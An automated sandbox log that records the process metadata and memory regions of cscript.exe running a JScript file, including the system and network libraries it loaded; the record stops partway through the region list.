# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Oct 17 2017 16:08:19 # Log Creation Date: 07.11.2017 19:24:09.105 Process: id = "1" image_name = "cscript.exe" filename = "c:\\windows\\system32\\cscript.exe" page_root = "0x624dc000" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\5P5NRG~1\\Desktop\\MYOBSU~1.JS\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7 start_va = 0xffa20000 end_va = 0xffa48fff entry_point = 0xffa20000 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 8 start_va = 0x7feff0b0000 end_va = 0x7feff0b0fff entry_point = 0x7feff0b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 11 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 144 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 145 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x76c70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 146 start_va = 0x7fefd000000 end_va = 0x7fefd06afff entry_point = 0x7fefd000000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 147 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 148 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 149 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 150 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x76b70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 151 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 152 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 153 start_va = 0x7fefbea0000 end_va = 0x7fefbeabfff entry_point = 0x7fefbea0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 154 start_va = 0x7fefe440000 end_va = 0x7fefe56cfff entry_point = 0x7fefe440000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 155 start_va = 0x7fefe570000 end_va = 0x7fefe772fff entry_point = 0x7fefe570000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 156 start_va = 0x7fefe780000 end_va = 0x7fefe85afff entry_point = 0x7fefe780000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 157 start_va = 0x7fefe970000 end_va = 0x7fefea0efff entry_point = 0x7fefe970000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 158 start_va = 0x7fefea10000 end_va = 0x7fefeae6fff entry_point = 0x7fefea10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 159 start_va = 0x7fefeaf0000 end_va = 0x7fefeafdfff entry_point = 0x7fefeaf0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 160 start_va = 0x7fefeb00000 end_va = 0x7fefeb66fff entry_point = 0x7fefeb00000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 161 start_va = 0x7fefec10000 end_va = 0x7fefecd8fff entry_point = 0x7fefec10000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 162 start_va = 0x7fefef00000 end_va = 0x7fefef1efff entry_point = 0x7fefef00000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 163 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 164 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 165 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 166 start_va = 0x7fefe860000 end_va = 0x7fefe968fff entry_point = 0x7fefe860000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 167 start_va = 0x7fefeec0000 end_va = 0x7fefeeedfff entry_point = 0x7fefeec0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 168 start_va = 0x40000 end_va = 0x46fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 169 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 170 start_va = 0x60000 end_va = 0x62fff entry_point = 0x60000 region_type = mapped_file name = "cscript.exe.mui" filename = "\\Windows\\System32\\en-US\\cscript.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cscript.exe.mui") Region: id = 171 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 172 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 173 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 174 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 175 start_va = 0x200000 end_va = 0x27cfff entry_point = 0x200000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 176 start_va = 0x200000 end_va = 0x27cfff entry_point = 0x20cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 177 start_va = 0x7fefcbd0000 end_va = 0x7fefcbdefff entry_point = 0x7fefcbd0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 178 start_va = 0x7fefaaf0000 end_va = 0x7fefab45fff entry_point = 0x7fefaaf0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 179 start_va = 0x1c70000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 180 start_va = 0x1c70000 end_va = 0x1d4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 181 start_va = 0x1de0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 182 start_va = 0x1f80000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 183 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 184 start_va = 0x2080000 end_va = 0x234efff entry_point = 0x2080000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 185 start_va = 0x200000 end_va = 0x213fff entry_point = 0x2028c4 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 186 start_va = 0x7fefcbe0000 end_va = 0x7fefcc70fff entry_point = 0x7fefcbe0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 187 start_va = 0x2400000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 188 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 189 start_va = 0x7fefa710000 end_va = 0x7fefa727fff entry_point = 0x7fefa710000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 190 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 191 start_va = 0x7fefd350000 end_va = 0x7fefd3e8fff entry_point = 0x7fefd350000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 192 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 193 start_va = 0x7fef2fe0000 end_va = 0x7fef30c2fff entry_point = 0x7fef2fe0000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 194 start_va = 0x7fefeb70000 end_va = 0x7fefebe0fff entry_point = 0x7fefeb70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 195 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 196 start_va = 0x7fefce30000 end_va = 0x7fefce69fff entry_point = 0x7fefce30000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 197 start_va = 0x7fefce90000 end_va = 0x7fefcff6fff entry_point = 0x7fefce90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 198 start_va = 0x7fefcd80000 end_va = 0x7fefcd8efff entry_point = 0x7fefcd80000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 199 start_va = 0x7fefc5d0000 end_va = 0x7fefc5e6fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 200 start_va = 0x240000 end_va = 0x284fff entry_point = 0x240000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 201 start_va = 0x240000 end_va = 0x284fff entry_point = 0x241064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 202 start_va = 0x240000 end_va = 0x284fff entry_point = 0x241064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 203 start_va = 0x240000 end_va = 0x284fff entry_point = 0x241064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 204 start_va = 0x240000 end_va = 0x284fff entry_point = 0x241064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 205 start_va = 0x7fefc2d0000 end_va = 0x7fefc316fff entry_point = 0x7fefc2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 206 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 207 start_va = 0x2510000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 208 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 209 start_va = 0x7fef74e0000 end_va = 0x7fef74eafff entry_point = 0x7fef74e0000 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 210 start_va = 0x2610000 end_va = 0x360ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002610000" filename = "" Region: id = 211 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 212 start_va = 0x3640000 end_va = 0x373ffff entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 213 start_va = 0x7fef7420000 end_va = 0x7fef743cfff entry_point = 0x7fef7420000 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 214 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 215 start_va = 0x7fef3a40000 end_va = 0x7fef3adffff entry_point = 0x7fef3a40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 216 start_va = 0x7fefd230000 end_va = 0x7fefd2c6fff entry_point = 0x7fefd230000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 217 start_va = 0x7fefd450000 end_va = 0x7fefe1d7fff entry_point = 0x7fefd450000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 218 start_va = 0x3740000 end_va = 0x392ffff entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 219 start_va = 0x1e60000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 220 start_va = 0x7fef3a00000 end_va = 0x7fef3a3bfff entry_point = 0x7fef3a00000 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll") Region: id = 221 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 222 start_va = 0x39e0000 end_va = 0x3adffff entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 223 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 224 start_va = 0x7fefccc0000 end_va = 0x7fefccd3fff entry_point = 0x7fefccc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 225 start_va = 0x3af0000 end_va = 0x3beffff entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 226 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 227 start_va = 0x250000 end_va = 0x250fff entry_point = 0x250000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 228 start_va = 0x3cc0000 end_va = 0x3dbffff entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 229 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 230 start_va = 0x3dc0000 end_va = 0x41b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dc0000" filename = "" Region: id = 231 start_va = 0x250000 end_va = 0x250fff entry_point = 0x250000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 232 start_va = 0x3740000 end_va = 0x383ffff entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 233 start_va = 0x3920000 end_va = 0x392ffff entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 234 start_va = 0x41c0000 end_va = 0x43bffff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 235 start_va = 0x43c0000 end_va = 0x47bffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 236 start_va = 0x47c0000 end_va = 0x49bffff entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 237 start_va = 0x49c0000 end_va = 0x4ac0fff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 238 start_va = 0x4b10000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 239 start_va = 0x5310000 end_va = 0x570ffff entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 240 start_va = 0x59a0000 end_va = 0x696ffff entry_point = 0x0 region_type = private name = "private_0x00000000059a0000" filename = "" Region: id = 241 start_va = 0x6970000 end_va = 0x716ffff entry_point = 0x0 region_type = private name = "private_0x0000000006970000" filename = "" Region: id = 242 start_va = 0x7680000 end_va = 0x864ffff entry_point = 0x0 region_type = private name = "private_0x0000000007680000" filename = "" Region: id = 243 start_va = 0x8650000 end_va = 0x9050fff entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 244 start_va = 0x9060000 end_va = 0xa02ffff entry_point = 0x0 region_type = private name = "private_0x0000000009060000" filename = "" Region: id = 245 start_va = 0xa030000 end_va = 0xaffffff entry_point = 0x0 region_type = private name = "private_0x000000000a030000" filename = "" Region: id = 246 start_va = 0x7fef73f0000 end_va = 0x7fef7417fff entry_point = 0x7fef73f0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 247 start_va = 0x7fef9be0000 end_va = 0x7fef9bf7fff entry_point = 0x7fef9be0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 248 start_va = 0x7fef3b40000 end_va = 0x7fef3b73fff entry_point = 0x7fef3b40000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 249 start_va = 0x250000 end_va = 0x263fff entry_point = 0x251070 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 250 start_va = 0x7fef3650000 end_va = 0x7fef3823fff entry_point = 0x7fef3650000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 251 start_va = 0x5710000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x0000000005710000" filename = "" Region: id = 252 start_va = 0x5710000 end_va = 0x584ffff entry_point = 0x0 region_type = private name = "private_0x0000000005710000" filename = "" Region: id = 253 start_va = 0x58e0000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x00000000058e0000" filename = "" Region: id = 254 start_va = 0x3840000 end_va = 0x38fffff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 255 start_va = 0x7170000 end_va = 0x731ffff entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 256 start_va = 0x7320000 end_va = 0x757ffff entry_point = 0x0 region_type = private name = "private_0x0000000007320000" filename = "" Region: id = 257 start_va = 0x3bf0000 end_va = 0x3caffff entry_point = 0x3bf0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 258 start_va = 0xb000000 end_va = 0xb3fffff entry_point = 0x0 region_type = private name = "private_0x000000000b000000" filename = "" Region: id = 259 start_va = 0x270000 end_va = 0x270fff entry_point = 0x270000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 260 start_va = 0x280000 end_va = 0x29afff entry_point = 0x2b6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 261 start_va = 0x7fefd0b0000 end_va = 0x7fefd227fff entry_point = 0x7fefd0b0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 262 start_va = 0x7fefef20000 end_va = 0x7feff049fff entry_point = 0x7fefef20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 263 start_va = 0x7fefe1e0000 end_va = 0x7fefe438fff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 264 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 265 start_va = 0x7fefb5f0000 end_va = 0x7fefb7e3fff entry_point = 0x7fefb5f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 266 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 267 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 268 start_va = 0x7fefcba0000 end_va = 0x7fefcbc4fff entry_point = 0x7fefcba0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 269 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 270 start_va = 0x7fefcce0000 end_va = 0x7fefcceefff entry_point = 0x7fefcce0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 271 start_va = 0x2e0000 end_va = 0x2ebfff entry_point = 0x2e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 272 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x2f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 273 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x300000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 274 start_va = 0x7fefbcd0000 end_va = 0x7fefbcfcfff entry_point = 0x7fefbcd0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 275 start_va = 0x7fefd3f0000 end_va = 0x7fefd441fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 276 start_va = 0x7feff050000 end_va = 0x7feff09cfff entry_point = 0x7feff050000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 277 start_va = 0x7fefeef0000 end_va = 0x7fefeef7fff entry_point = 0x7fefeef0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 278 start_va = 0x7320000 end_va = 0x747ffff entry_point = 0x0 region_type = private name = "private_0x0000000007320000" filename = "" Region: id = 279 start_va = 0x7500000 end_va = 0x757ffff entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 280 start_va = 0x7fefc3f0000 end_va = 0x7fefc44afff entry_point = 0x7fefc3f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 281 start_va = 0x7170000 end_va = 0x727ffff entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 282 start_va = 0x72a0000 end_va = 0x731ffff entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 283 